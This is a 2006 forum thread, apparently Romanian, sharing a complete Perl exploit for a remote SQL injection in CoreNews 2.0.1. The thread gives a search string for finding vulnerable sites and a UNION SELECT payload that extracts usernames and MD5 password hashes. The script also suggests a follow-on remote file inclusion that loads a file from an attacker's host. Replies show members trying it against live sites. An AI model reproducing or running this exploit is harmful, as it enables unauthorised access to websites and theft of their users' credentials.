Screech Posted July 4, 2006 Report Posted July 4, 2006 Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.htmlSearch: Powered by CoreNews 2.0.1Exploit: #!/usr/bin/perl#Method found & Exploit scripted by nukedx#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com#Original advisory: http://www.nukedx.com/?viewdoc=24#Usage: corenews.pl <host> <path>use IO::Socket;if(@ARGV != 2) { usage(); }else { exploit(); }sub header(){ print "n- NukedX Security Advisory Nr.2006-24rn"; print "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn";}sub usage() { header(); print "- Usage: $0 <host> <path>rn"; print "- <host> -> Victim's host ex: http://www.victim.comrn"; print "- <path> -> Path to CoreNews ex: /corenews/rn"; exit();}sub exploit () { #Our variables... $cnserver = $ARGV[0]; $cnserver =~ s/(http://)//eg; $cnhost = "http://".$cnserver; $cndir = $ARGV[1]; $cnport = "80"; $cntar = "preview.php?userid="; $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; $cnreq = $cnhost.$cndir.$cntar.$cnxp; #Sending data... header(); print "- Trying to connect: $cnserverrn"; $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n"; print $cn "GET $cnreq HTTP/1.1n"; print $cn "Accept: */*n"; print $cn "Referer: $cnhostn"; print $cn "Accept-Language: trn"; print $cn "User-Agent: NukeZillan"; print $cn "Cache-Control: no-cachen"; print $cn "Host: $cnservern"; print $cn "Connection: closenn"; print "- Connected...rn"; while ($answer = <$cn>) { if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) { print "- Exploit succeed!rn"; print "- Username: $1rn"; print "- MD5 HASH of PASSWORD: $2rn"; print "- If you crack hash you can use RFI with example ->rn"; print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn"; exit(); } } #Exploit failed... print "- Exploit failedn"}[/list:u] Quote
Thunder Posted July 4, 2006 Report Posted July 4, 2006 Mersi . Il iau acum . Revin cu comentarii .. Quote
Thunder Posted July 4, 2006 Report Posted July 4, 2006 Nu mia iesit pe nici-un site . Oricum poate oi fi gresit pe undeva . Daca reuseste iti da md5 care doar daca ai noroc poti sa-l " descifrezi " si sa aflii passul . Quote
Screech Posted August 8, 2006 Author Report Posted August 8, 2006 <div class='quotetop'>QUOTE("johnslax")</div>numai merge linkul : :@http://rapidshare.de/files/28591545/core_n..._2.0.1.rar.html Quote
zbeng Posted August 8, 2006 Report Posted August 8, 2006 NU MAI faceti dublu post pt asat aveti butonul EDIT Quote